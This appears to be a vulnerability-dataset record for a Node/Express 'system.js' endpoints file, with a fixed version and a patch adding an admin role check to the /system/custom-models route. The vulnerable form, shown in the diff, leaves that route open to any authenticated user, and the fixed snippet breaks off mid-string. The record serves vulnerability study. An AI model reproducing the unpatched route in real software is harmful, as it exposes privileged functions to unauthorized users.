chatHistoryViewable,\n validatedRequest,\n flexUserRoleValid([ROLES.admin, ROLES.manager]),\n ],\n async (request, response) => {\n try {\n const { offset = 0, limit = 20 } = reqBody(request);\n const chats = await WorkspaceChats.whereWithData(\n {},\n limit,\n offset * limit,\n { id: 
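Editor's note: in the vulnerable snippet above, /system/custom-models is registered with [validatedRequest] alone, and this record's vul_patch (at the end of the entry) shows the fix is a single line adding flexUserRoleValid([ROLES.admin]). Below is a hedged Go sketch of that kind of role-gating middleware; requireRole, userRole, and the role constants are illustrative assumptions, not this project's API.

    package main

    import (
        "fmt"
        "net/http"
    )

    type role string

    const (
        roleAdmin   role = "admin"
        roleManager role = "manager"
    )

    // userRole is a stand-in for however the session's role is recovered from a
    // validated request (e.g. a JWT claim); it is an assumption for this sketch.
    func userRole(r *http.Request) role {
        return role(r.Header.Get("X-Demo-Role")) // demo only, not a real auth source
    }

    // requireRole mirrors the idea of flexUserRoleValid: run the handler only
    // when the caller holds one of the allowed roles, otherwise reject.
    func requireRole(allowed []role, next http.HandlerFunc) http.HandlerFunc {
        return func(w http.ResponseWriter, r *http.Request) {
            got := userRole(r)
            for _, a := range allowed {
                if got == a {
                    next(w, r)
                    return
                }
            }
            http.Error(w, "unauthorized", http.StatusUnauthorized)
        }
    }

    func main() {
        http.HandleFunc("/system/custom-models", requireRole([]role{roleAdmin},
            func(w http.ResponseWriter, r *http.Request) {
                fmt.Fprintln(w, "custom model list would be returned here")
            }))
        // http.ListenAndServe(":8080", nil) // omitted so the sketch stays inert
    }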
\"desc\" }\n );\n const totalChats = await WorkspaceChats.count();\n const hasPages = totalChats > (offset + 1) * limit;\n\n response.status(200).json({ chats: chats, hasPages, totalChats });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/workspace-chats/:id\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { id } = request.params;\n Number(id) === -1\n ? await WorkspaceChats.delete({}, true)\n : await WorkspaceChats.delete({ id: Number(id) });\n response.json({ success: true, error: null });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/export-chats\",\n [\n chatHistoryViewable,\n validatedRequest,\n flexUserRoleValid([ROLES.manager, ROLES.admin]),\n ],\n async (request, response) => {\n try {\n const { type = \"jsonl\", chatType = \"workspace\" } = request.query;\n const { contentType, data } = await exportChatsAsType(type, chatType);\n await EventLogs.logEvent(\n \"exported_chats\",\n {\n type,\n chatType,\n },\n response.locals.user?.id\n );\n response.setHeader(\"Content-Type\", contentType);\n response.status(200).send(data);\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n // Used for when a user in multi-user updates their own profile\n // from the UI.\n app.post(\"/system/user\", [validatedRequest], async (request, response) => {\n try {\n const sessionUser = await userFromSession(request, response);\n const { username, password } = reqBody(request);\n const id = Number(sessionUser.id);\n\n if (!id) {\n response.status(400).json({ success: false, error: \"Invalid user ID\" });\n return;\n }\n\n const updates = {};\n if (username) {\n updates.username = User.validations.username(String(username));\n }\n if (password) {\n updates.password = String(password);\n }\n\n if (Object.keys(updates).length === 0) {\n response\n .status(400)\n .json({ success: false, error: \"No updates provided\" });\n return;\n }\n\n const { success, error } = await User.update(id, updates);\n response.status(200).json({ success, error });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/system/slash-command-presets\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const userPresets = await SlashCommandPresets.getUserPresets(user?.id);\n response.status(200).json({ presets: userPresets });\n } catch (error) {\n console.error(\"Error fetching slash command presets:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/slash-command-presets\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const { command, prompt, description } = reqBody(request);\n const presetData = {\n command: SlashCommandPresets.formatCommand(String(command)),\n prompt: String(prompt),\n description: String(description),\n };\n\n const preset = await SlashCommandPresets.create(user?.id, presetData);\n if (!preset) {\n return response\n .status(500)\n .json({ message: \"Failed to create preset\" });\n }\n response.status(201).json({ preset });\n } catch (error) {\n console.error(\"Error creating slash command preset:\", error);\n response.status(500).json({ message: \"Internal server 
error\" });\n }\n }\n );\n\n app.post(\n \"/system/slash-command-presets/:slashCommandId\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const { slashCommandId } = request.params;\n const { command, prompt, description } = reqBody(request);\n\n // Valid user running owns the preset if user session is valid.\n const ownsPreset = await SlashCommandPresets.get({\n userId: user?.id ?? null,\n id: Number(slashCommandId),\n });\n if (!ownsPreset)\n return response.status(404).json({ message: \"Preset not found\" });\n\n const updates = {\n command: SlashCommandPresets.formatCommand(String(command)),\n prompt: String(prompt),\n description: String(description),\n };\n\n const preset = await SlashCommandPresets.update(\n Number(slashCommandId),\n updates\n );\n if (!preset) return response.sendStatus(422);\n response.status(200).json({ preset: { ...ownsPreset, ...updates } });\n } catch (error) {\n console.error(\"Error updating slash command preset:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.delete(\n \"/system/slash-command-presets/:slashCommandId\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const { slashCommandId } = request.params;\n const user = await userFromSession(request, response);\n\n // Valid user running owns the preset if user session is valid.\n const ownsPreset = await SlashCommandPresets.get({\n userId: user?.id ?? null,\n id: Number(slashCommandId),\n });\n if (!ownsPreset)\n return response\n .status(403)\n .json({ message: \"Failed to delete preset\" });\n\n await SlashCommandPresets.delete(Number(slashCommandId));\n response.sendStatus(204);\n } catch (error) {\n console.error(\"Error deleting slash command preset:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n}"}], "fix_func": [{"id": "fix_js_265_1", "commit": "8d302c3f670c582b09d47e96132c248101447a11", "file_path": "server/endpoints/system.js", "start_line": 60, "end_line": 1220, "snippet": "function systemEndpoints(app) {\n if (!app) return;\n\n app.get(\"/ping\", (_, response) => {\n response.status(200).json({ online: true });\n });\n\n app.get(\"/migrate\", async (_, response) => {\n response.sendStatus(200);\n });\n\n app.get(\"/env-dump\", async (_, response) => {\n if (process.env.NODE_ENV !== \"production\")\n return response.sendStatus(200).end();\n dumpENV();\n response.sendStatus(200).end();\n });\n\n app.get(\"/setup-complete\", async (_, response) => {\n try {\n const results = await SystemSettings.currentSettings();\n response.status(200).json({ results });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/system/check-token\",\n [validatedRequest],\n async (request, response) => {\n try {\n if (multiUserMode(response)) {\n const user = await userFromSession(request, response);\n if (!user || user.suspended) {\n response.sendStatus(403).end();\n return;\n }\n\n response.sendStatus(200).end();\n return;\n }\n\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\"/request-token\", async (request, response) => {\n try {\n const bcrypt = require(\"bcrypt\");\n\n if (await SystemSettings.isMultiUserMode()) {\n const { username, password } = reqBody(request);\n const existingUser = await User._get({ 
username: String(username) });\n\n if (!existingUser) {\n await EventLogs.logEvent(\n \"failed_login_invalid_username\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[001] Invalid login credentials.\",\n });\n return;\n }\n\n if (!bcrypt.compareSync(String(password), existingUser.password)) {\n await EventLogs.logEvent(\n \"failed_login_invalid_password\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[002] Invalid login credentials.\",\n });\n return;\n }\n\n if (existingUser.suspended) {\n await EventLogs.logEvent(\n \"failed_login_account_suspended\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[004] Account suspended by admin.\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: false },\n existingUser?.id\n );\n\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: existingUser.username || \"Unknown user\",\n },\n existingUser?.id\n );\n\n // Check if the user has seen the recovery codes\n if (!existingUser.seen_recovery_codes) {\n const plainTextCodes = await generateRecoveryCodes(existingUser.id);\n\n // Return recovery codes to frontend\n response.status(200).json({\n valid: true,\n user: User.filterFields(existingUser),\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n recoveryCodes: plainTextCodes,\n });\n return;\n }\n\n response.status(200).json({\n valid: true,\n user: User.filterFields(existingUser),\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n });\n return;\n } else {\n const { password } = reqBody(request);\n if (\n !bcrypt.compareSync(\n password,\n bcrypt.hashSync(process.env.AUTH_TOKEN, 10)\n )\n ) {\n await EventLogs.logEvent(\"failed_login_invalid_password\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(401).json({\n valid: false,\n token: null,\n message: \"[003] Invalid password provided\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\"login_event\", { multiUserMode: false });\n await EventLogs.logEvent(\"login_event\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(200).json({\n valid: true,\n token: makeJWT(\n { p: new EncryptionManager().encrypt(password) },\n \"30d\"\n ),\n message: null,\n });\n }\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/request-token/sso/simple\",\n [simpleSSOEnabled],\n async (request, response) => {\n const { token: tempAuthToken } = request.query;\n const { sessionToken, token, error } =\n await TemporaryAuthToken.validate(tempAuthToken);\n\n if (error) {\n await EventLogs.logEvent(\"failed_login_invalid_temporary_auth_token\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: true,\n });\n return response.status(401).json({\n valid: false,\n token: null,\n message: `[001] An error occurred while validating the token: ${error}`,\n });\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: true 
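Editor's note: the /request-token handler above rests on bcrypt.compareSync — per-user hashes in multi-user mode, a freshly hashed AUTH_TOKEN in single-user mode — before minting a 30-day JWT. A minimal sketch of the equivalent check in Go, using golang.org/x/crypto/bcrypt; the session-token step is left as a comment because its shape is project-specific.

    package main

    import (
        "fmt"

        "golang.org/x/crypto/bcrypt"
    )

    func main() {
        // Stored at account creation: a salted bcrypt hash, never the plaintext.
        hash, err := bcrypt.GenerateFromPassword([]byte("s3cret"), bcrypt.DefaultCost)
        if err != nil {
            panic(err)
        }

        // At login: CompareHashAndPassword returns nil only on a match, doing
        // the work compareSync does in the handler above.
        if err := bcrypt.CompareHashAndPassword(hash, []byte("s3cret")); err != nil {
            fmt.Println("invalid login credentials")
            return
        }
        fmt.Println("credentials accepted; a session token would be issued here")
    }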
},\n token.user.id\n );\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: token.user.username || \"Unknown user\",\n },\n token.user.id\n );\n\n response.status(200).json({\n valid: true,\n user: User.filterFields(token.user),\n token: sessionToken,\n message: null,\n });\n }\n );\n\n app.post(\n \"/system/recover-account\",\n [isMultiUserSetup],\n async (request, response) => {\n try {\n const { username, recoveryCodes } = reqBody(request);\n const { success, resetToken, error } = await recoverAccount(\n username,\n recoveryCodes\n );\n\n if (success) {\n response.status(200).json({ success, resetToken });\n } else {\n response.status(400).json({ success, message: error });\n }\n } catch (error) {\n console.error(\"Error recovering account:\", error);\n response\n .status(500)\n .json({ success: false, message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/reset-password\",\n [isMultiUserSetup],\n async (request, response) => {\n try {\n const { token, newPassword, confirmPassword } = reqBody(request);\n const { success, message, error } = await resetPassword(\n token,\n newPassword,\n confirmPassword\n );\n\n if (success) {\n response.status(200).json({ success, message });\n } else {\n response.status(400).json({ success, error });\n }\n } catch (error) {\n console.error(\"Error resetting password:\", error);\n response.status(500).json({ success: false, message: error.message });\n }\n }\n );\n\n app.get(\n \"/system/system-vectors\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const query = queryParams(request);\n const VectorDb = getVectorDbClass();\n const vectorCount = !!query.slug\n ? await VectorDb.namespaceCount(query.slug)\n : await VectorDb.totalVectors();\n response.status(200).json({ vectorCount });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-document\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { name } = reqBody(request);\n await purgeDocument(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-documents\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { names } = reqBody(request);\n for await (const name of names) await purgeDocument(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-folder\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { name } = reqBody(request);\n await purgeFolder(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/local-files\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (_, response) => {\n try {\n const localFiles = await viewLocalFiles();\n response.status(200).json({ localFiles });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/document-processing-status\",\n [validatedRequest],\n async (_, response) => {\n try {\n const online = await new 
CollectorApi().online();\n response.sendStatus(online ? 200 : 503);\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/accepted-document-types\",\n [validatedRequest],\n async (_, response) => {\n try {\n const types = await new CollectorApi().acceptedFileTypes();\n if (!types) {\n response.sendStatus(404).end();\n return;\n }\n\n response.status(200).json({ types });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/update-env\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const body = reqBody(request);\n const { newValues, error } = await updateENV(\n body,\n false,\n response?.locals?.user?.id\n );\n response.status(200).json({ newValues, error });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/update-password\",\n [validatedRequest],\n async (request, response) => {\n try {\n // Cannot update password in multi - user mode.\n if (multiUserMode(response)) {\n response.sendStatus(401).end();\n return;\n }\n\n let error = null;\n const { usePassword, newPassword } = reqBody(request);\n if (!usePassword) {\n // Password is being disabled so directly unset everything to bypass validation.\n process.env.AUTH_TOKEN = \"\";\n process.env.JWT_SECRET = \"\";\n } else {\n error = await updateENV(\n {\n AuthToken: newPassword,\n JWTSecret: v4(),\n },\n true\n )?.error;\n }\n response.status(200).json({ success: !error, error });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/enable-multi-user\",\n [validatedRequest],\n async (request, response) => {\n try {\n if (response.locals.multiUserMode) {\n response.status(200).json({\n success: false,\n error: \"Multi-user mode is already enabled.\",\n });\n return;\n }\n\n const { username, password } = reqBody(request);\n const { user, error } = await User.create({\n username,\n password,\n role: ROLES.admin,\n });\n\n if (error || !user) {\n response.status(400).json({\n success: false,\n error: error || \"Failed to enable multi-user mode.\",\n });\n return;\n }\n\n await SystemSettings._updateSettings({\n multi_user_mode: true,\n });\n await BrowserExtensionApiKey.migrateApiKeysToMultiUser(user.id);\n\n await updateENV(\n {\n JWTSecret: process.env.JWT_SECRET || v4(),\n },\n true\n );\n await Telemetry.sendTelemetry(\"enabled_multi_user_mode\", {\n multiUserMode: true,\n });\n await EventLogs.logEvent(\"multi_user_mode_enabled\", {}, user?.id);\n response.status(200).json({ success: !!user, error });\n } catch (e) {\n await User.delete({});\n await SystemSettings._updateSettings({\n multi_user_mode: false,\n });\n\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\"/system/multi-user-mode\", async (_, response) => {\n try {\n const multiUserMode = await SystemSettings.isMultiUserMode();\n response.status(200).json({ multiUserMode });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\"/system/logo\", async function (request, response) {\n try {\n const darkMode =\n !request?.query?.theme || request?.query?.theme === \"default\";\n const defaultFilename = getDefaultFilename(darkMode);\n const logoPath = await determineLogoFilepath(defaultFilename);\n const { found, buffer, size, mime } = fetchLogo(logoPath);\n\n if (!found) {\n 
response.sendStatus(204).end();\n return;\n }\n\n const currentLogoFilename = await SystemSettings.currentLogoFilename();\n response.writeHead(200, {\n \"Access-Control-Expose-Headers\":\n \"Content-Disposition,X-Is-Custom-Logo,Content-Type,Content-Length\",\n \"Content-Type\": mime || \"image/png\",\n \"Content-Disposition\": `attachment; filename=${path.basename(\n logoPath\n )}`,\n \"Content-Length\": size,\n \"X-Is-Custom-Logo\":\n currentLogoFilename !== null &&\n currentLogoFilename !== defaultFilename &&\n !isDefaultFilename(currentLogoFilename),\n });\n response.end(Buffer.from(buffer, \"base64\"));\n return;\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\"/system/footer-data\", [validatedRequest], async (_, response) => {\n try {\n const footerData =\n (await SystemSettings.get({ label: \"footer_data\" }))?.value ??\n JSON.stringify([]);\n response.status(200).json({ footerData: footerData });\n } catch (error) {\n console.error(\"Error fetching footer data:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\"/system/support-email\", [validatedRequest], async (_, response) => {\n try {\n const supportEmail =\n (\n await SystemSettings.get({\n label: \"support_email\",\n })\n )?.value ?? null;\n response.status(200).json({ supportEmail: supportEmail });\n } catch (error) {\n console.error(\"Error fetching support email:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n // No middleware protection in order to get this on the login page\n app.get(\"/system/custom-app-name\", async (_, response) => {\n try {\n const customAppName =\n (\n await SystemSettings.get({\n label: \"custom_app_name\",\n })\n )?.value ?? 
null;\n response.status(200).json({ customAppName: customAppName });\n } catch (error) {\n console.error(\"Error fetching custom app name:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\n \"/system/pfp/:id\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (request, response) {\n try {\n const { id } = request.params;\n if (response.locals?.user?.id !== Number(id))\n return response.sendStatus(204).end();\n\n const pfpPath = await determinePfpFilepath(id);\n if (!pfpPath) return response.sendStatus(204).end();\n\n const { found, buffer, size, mime } = fetchPfp(pfpPath);\n if (!found) return response.sendStatus(204).end();\n\n response.writeHead(200, {\n \"Content-Type\": mime || \"image/png\",\n \"Content-Disposition\": `attachment; filename=${path.basename(pfpPath)}`,\n \"Content-Length\": size,\n });\n response.end(Buffer.from(buffer, \"base64\"));\n return;\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/upload-pfp\",\n [validatedRequest, flexUserRoleValid([ROLES.all]), handlePfpUpload],\n async function (request, response) {\n try {\n const user = await userFromSession(request, response);\n const uploadedFileName = request.randomFileName;\n if (!uploadedFileName) {\n return response.status(400).json({ message: \"File upload failed.\" });\n }\n\n const userRecord = await User.get({ id: user.id });\n const oldPfpFilename = userRecord.pfpFilename;\n if (oldPfpFilename) {\n const storagePath = path.join(__dirname, \"../storage/assets/pfp\");\n const oldPfpPath = path.join(\n storagePath,\n normalizePath(userRecord.pfpFilename)\n );\n if (!isWithin(path.resolve(storagePath), path.resolve(oldPfpPath)))\n throw new Error(\"Invalid path name\");\n if (fs.existsSync(oldPfpPath)) fs.unlinkSync(oldPfpPath);\n }\n\n const { success, error } = await User.update(user.id, {\n pfpFilename: uploadedFileName,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Profile picture uploaded successfully.\"\n : error || \"Failed to update with new profile picture.\",\n });\n } catch (error) {\n console.error(\"Error processing the profile picture upload:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.delete(\n \"/system/remove-pfp\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (request, response) {\n try {\n const user = await userFromSession(request, response);\n const userRecord = await User.get({ id: user.id });\n const oldPfpFilename = userRecord.pfpFilename;\n\n if (oldPfpFilename) {\n const storagePath = path.join(__dirname, \"../storage/assets/pfp\");\n const oldPfpPath = path.join(\n storagePath,\n normalizePath(oldPfpFilename)\n );\n if (!isWithin(path.resolve(storagePath), path.resolve(oldPfpPath)))\n throw new Error(\"Invalid path name\");\n if (fs.existsSync(oldPfpPath)) fs.unlinkSync(oldPfpPath);\n }\n\n const { success, error } = await User.update(user.id, {\n pfpFilename: null,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? 
\"Profile picture removed successfully.\"\n : error || \"Failed to remove profile picture.\",\n });\n } catch (error) {\n console.error(\"Error processing the profile picture removal:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/upload-logo\",\n [\n validatedRequest,\n flexUserRoleValid([ROLES.admin, ROLES.manager]),\n handleAssetUpload,\n ],\n async (request, response) => {\n if (!request?.file || !request?.file.originalname) {\n return response.status(400).json({ message: \"No logo file provided.\" });\n }\n\n if (!validFilename(request.file.originalname)) {\n return response.status(400).json({\n message: \"Invalid file name. Please choose a different file.\",\n });\n }\n\n try {\n const newFilename = await renameLogoFile(request.file.originalname);\n const existingLogoFilename = await SystemSettings.currentLogoFilename();\n await removeCustomLogo(existingLogoFilename);\n\n const { success, error } = await SystemSettings._updateSettings({\n logo_filename: newFilename,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Logo uploaded successfully.\"\n : error || \"Failed to update with new logo.\",\n });\n } catch (error) {\n console.error(\"Error processing the logo upload:\", error);\n response.status(500).json({ message: \"Error uploading the logo.\" });\n }\n }\n );\n\n app.get(\"/system/is-default-logo\", async (_, response) => {\n try {\n const currentLogoFilename = await SystemSettings.currentLogoFilename();\n const isDefaultLogo = currentLogoFilename === LOGO_FILENAME;\n response.status(200).json({ isDefaultLogo });\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\n \"/system/remove-logo\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (_request, response) => {\n try {\n const currentLogoFilename = await SystemSettings.currentLogoFilename();\n await removeCustomLogo(currentLogoFilename);\n const { success, error } = await SystemSettings._updateSettings({\n logo_filename: LOGO_FILENAME,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Logo removed successfully.\"\n : error || \"Failed to update with new logo.\",\n });\n } catch (error) {\n console.error(\"Error processing the logo removal:\", error);\n response.status(500).json({ message: \"Error removing the logo.\" });\n }\n }\n );\n\n app.get(\n \"/system/welcome-messages\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (_, response) {\n try {\n const welcomeMessages = await WelcomeMessages.getMessages();\n response.status(200).json({ success: true, welcomeMessages });\n } catch (error) {\n console.error(\"Error fetching welcome messages:\", error);\n response\n .status(500)\n .json({ success: false, message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/set-welcome-messages\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { messages = [] } = reqBody(request);\n if (!Array.isArray(messages)) {\n return response.status(400).json({\n success: false,\n message: \"Invalid message format. 
Expected an array of messages.\",\n });\n }\n\n await WelcomeMessages.saveAll(messages);\n return response.status(200).json({\n success: true,\n message: \"Welcome messages saved successfully.\",\n });\n } catch (error) {\n console.error(\"Error processing the welcome messages:\", error);\n response.status(500).json({\n success: true,\n message: \"Error saving the welcome messages.\",\n });\n }\n }\n );\n\n app.get(\"/system/api-keys\", [validatedRequest], async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n const apiKeys = await ApiKey.where({});\n return response.status(200).json({\n apiKeys,\n error: null,\n });\n } catch (error) {\n console.error(error);\n response.status(500).json({\n apiKey: null,\n error: \"Could not find an API Key.\",\n });\n }\n });\n\n app.post(\n \"/system/generate-api-key\",\n [validatedRequest],\n async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n const { apiKey, error } = await ApiKey.create();\n await Telemetry.sendTelemetry(\"api_key_created\");\n await EventLogs.logEvent(\n \"api_key_created\",\n {},\n response?.locals?.user?.id\n );\n return response.status(200).json({\n apiKey,\n error,\n });\n } catch (error) {\n console.error(error);\n response.status(500).json({\n apiKey: null,\n error: \"Error generating api key.\",\n });\n }\n }\n );\n\n app.delete(\"/system/api-key\", [validatedRequest], async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n await ApiKey.delete();\n await EventLogs.logEvent(\n \"api_key_deleted\",\n { deletedBy: response.locals?.user?.username },\n response?.locals?.user?.id\n );\n return response.status(200).end();\n } catch (error) {\n console.error(error);\n response.status(500).end();\n }\n });\n\n app.post(\n \"/system/custom-models\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const { provider, apiKey = null, basePath = null } = reqBody(request);\n const { models, error } = await getCustomModels(\n provider,\n apiKey,\n basePath\n );\n return response.status(200).json({\n models,\n error,\n });\n } catch (error) {\n console.error(error);\n response.status(500).end();\n }\n }\n );\n\n app.post(\n \"/system/event-logs\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const { offset = 0, limit = 10 } = reqBody(request);\n const logs = await EventLogs.whereWithData({}, limit, offset * limit, {\n id: \"desc\",\n });\n const totalLogs = await EventLogs.count();\n const hasPages = totalLogs > (offset + 1) * limit;\n\n response.status(200).json({ logs: logs, hasPages, totalLogs });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/event-logs\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (_, response) => {\n try {\n await EventLogs.delete();\n await EventLogs.logEvent(\n \"event_logs_cleared\",\n {},\n response?.locals?.user?.id\n );\n response.json({ success: true });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/workspace-chats\",\n [\n chatHistoryViewable,\n validatedRequest,\n flexUserRoleValid([ROLES.admin, ROLES.manager]),\n ],\n async (request, response) => {\n try {\n const { offset = 0, limit = 20 } = reqBody(request);\n const chats = await WorkspaceChats.whereWithData(\n 
{},\n limit,\n offset * limit,\n { id: \"desc\" }\n );\n const totalChats = await WorkspaceChats.count();\n const hasPages = totalChats > (offset + 1) * limit;\n\n response.status(200).json({ chats: chats, hasPages, totalChats });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/workspace-chats/:id\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { id } = request.params;\n Number(id) === -1\n ? await WorkspaceChats.delete({}, true)\n : await WorkspaceChats.delete({ id: Number(id) });\n response.json({ success: true, error: null });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/export-chats\",\n [\n chatHistoryViewable,\n validatedRequest,\n flexUserRoleValid([ROLES.manager, ROLES.admin]),\n ],\n async (request, response) => {\n try {\n const { type = \"jsonl\", chatType = \"workspace\" } = request.query;\n const { contentType, data } = await exportChatsAsType(type, chatType);\n await EventLogs.logEvent(\n \"exported_chats\",\n {\n type,\n chatType,\n },\n response.locals.user?.id\n );\n response.setHeader(\"Content-Type\", contentType);\n response.status(200).send(data);\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n // Used for when a user in multi-user updates their own profile\n // from the UI.\n app.post(\"/system/user\", [validatedRequest], async (request, response) => {\n try {\n const sessionUser = await userFromSession(request, response);\n const { username, password } = reqBody(request);\n const id = Number(sessionUser.id);\n\n if (!id) {\n response.status(400).json({ success: false, error: \"Invalid user ID\" });\n return;\n }\n\n const updates = {};\n if (username) {\n updates.username = User.validations.username(String(username));\n }\n if (password) {\n updates.password = String(password);\n }\n\n if (Object.keys(updates).length === 0) {\n response\n .status(400)\n .json({ success: false, error: \"No updates provided\" });\n return;\n }\n\n const { success, error } = await User.update(id, updates);\n response.status(200).json({ success, error });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/system/slash-command-presets\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async (request, response) => {\n try {\n const user = await userFromSession(request, response);\n const userPresets = await SlashCommandPresets.getUserPresets(user?.id);\n response.status(200).json({ presets: userPresets });\n } catch (error) {\n console.error(\"Error fetching slash 